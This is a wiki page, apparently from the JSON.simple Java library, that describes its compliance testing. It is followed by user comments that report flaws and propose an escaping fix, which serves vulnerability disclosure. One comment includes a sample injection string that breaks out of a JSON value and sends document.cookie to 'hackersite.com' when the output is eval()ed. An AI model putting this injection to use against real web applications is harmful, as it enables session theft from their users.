|
ComplianceTesting
Compliance tesing results
IntroductionJSON.simple uses json-test-suite to do compliance testing. Please follow The mapping between JSON and Java to get the result compliant to JSON spec. Please note that interface JSONAware and JSONStreamAware is to provide the flexibility and freedom to the user so that he can render the result in any way and make any extensions (such as comments that are not supported by JSON spec), so the user should know what he's doing when he implements these interfaces. Steps
ant -f test.xml compliance TEST-org.json.simple.compliance.EncoderTest.txt TEST-org.json.simple.compliance.DecoderTest.txt ResultsBoth of the encoder and decoder have passed tens of thousands randomly generated samples. No errors found so far. In real world applications, JSON.simple has been used in quite a few projects in the past years.
How does it work?TBD | ||||||||||
► Sign in to add a comment
I'm not so sure about its compliance, it failed on a simple test of dumping a bean in a Map.
and it outputs
{"value":"theValue","class":class fi.gtech.json.TestInterface$Beanie,"cyclic":fi.gtech.json.TestInterface$Beanie@f668b23,"number":23}Also the existence of JSONAware as a public interface opens the API to developer errors such as the following
public static void main(String[] args) { JSONObject json = new JSONObject(); json.put("badBean", new BadBean(CONSTANT)); System.out.println("eval()ed to \n(" + json.toJSONString() + ")"); json = new JSONObject(); json.put("badBean", new BadBean("\"}); ajax.send('hackersite.com', document.cookie); ....")); System.out.println("eval()ed to \n(" + json.toJSONString() + ")"); } public static class BadBean implements JSONAware { private String string = "string"; public BadBean(String string) { this.string = string; } public String getString() { return string; } public void setString(String string) { this.string = string; } public String toJSONString() { return "\"" + string + "\""; } }which outputs
eval()ed to ({"badBean":"myconstant"}) eval()ed to ({"badBean":""}); ajax.send('hackersite.com', document.cookie); ...."})to fix this you should replace JSONValue.java line 154: out.write(value.toString()); with
out.write('\"'); out.write(escape(value.toString())); out.write('\"');and
JSONValue.java line 207: return value.toString();
with
And take the public statement out of both JSONAware and JSONStreamAware
I don't think having Beans able to represent themselves as JSON is a good design. One would not have a toHTML() method in every bean you sue a JSP or similar to represent the Bean. It makes better sense to separate the model and the view and have JSONObject itself handle representing beans as JSON, perhaps have a method in JSONObject called putBean(Object bean) that does reflection and reads the getter methods, producing valid JSON output when requested.
JSON.simple guarantees that the result is compliant to JSON spec only if the rule of it is followed:
http://code.google.com/p/json-simple/wiki/MappingBetweenJSONAndJavaEntities
The interface JSONAware provides the freedom to the user to make any extensions (such as comments which are not supported by the JSON spec), so the user should know exactly what they are doing when they implement the interface.